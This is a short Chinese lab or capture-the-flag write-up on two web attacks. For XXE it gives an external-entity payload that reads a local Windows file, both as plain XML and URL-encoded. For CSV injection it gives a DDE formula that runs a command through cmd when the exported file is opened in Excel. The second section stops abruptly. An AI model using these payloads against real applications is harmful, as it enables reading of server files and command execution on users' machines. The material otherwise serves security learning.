一、xxe注入
这道题应该是XXE漏洞最基础的任意文件读取
打开是一个输入框
在C盘构造一个flag。别问我为啥,为也不知道
bp抓个包
随便输入个什么都有回显,应该是基础的XXE注入
这是一段读取文件的xml
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY B SYSTEM "file:///c:/1.txt">
]>
<xml>
<xxe>&B;</xxe>
</xml>
由于存在换行,所以转化为URL编码:%3C%3F%78%6D%6C%20%76%65%72%73%69%6F%6E%3D%22%31%2E%30%22%3F%3E%0D%0A%3C%21%44%4F%43%54%59%50%45%20%41%4E%59%20%5B%0D%0A%20%20%20%20%3C%21%45%4E%54%49%54%59%20%42%20%53%59%53%54%45%4D%20%22%66%69%6C%65%3A%2F%2F%2F%63%3A%2F%31%2E%74%78%74%22%3E%0D%0A%5D%3E%0D%0A%3C%78%6D%6C%3E%0D%0A%20%20%20%20%3C%78%78%65%3E%26%42%3B%3C%2F%78%78%65%3E%0D%0A%3C%2F%78%6D%6C%3E%20%20%20
成功读取到本地flag
二、csv注入
CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量。攻击包含向恶意的EXCEL公式中注入可以输出或以CSV文件读取的参数。当在Excel中打开CSV文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能。在这个过程中,CSV中的所有Excel公式都会执行。当该函数有合法意图时,很易被滥用并允许恶意代码执行。
打开靶场
当输入一个公式,会被Excel自动运算并执行。
我们构造以下代码
=1+cmd|' /C calc'!A0
当我们导出时,生成csv文件时,打开
然后。。。。。。。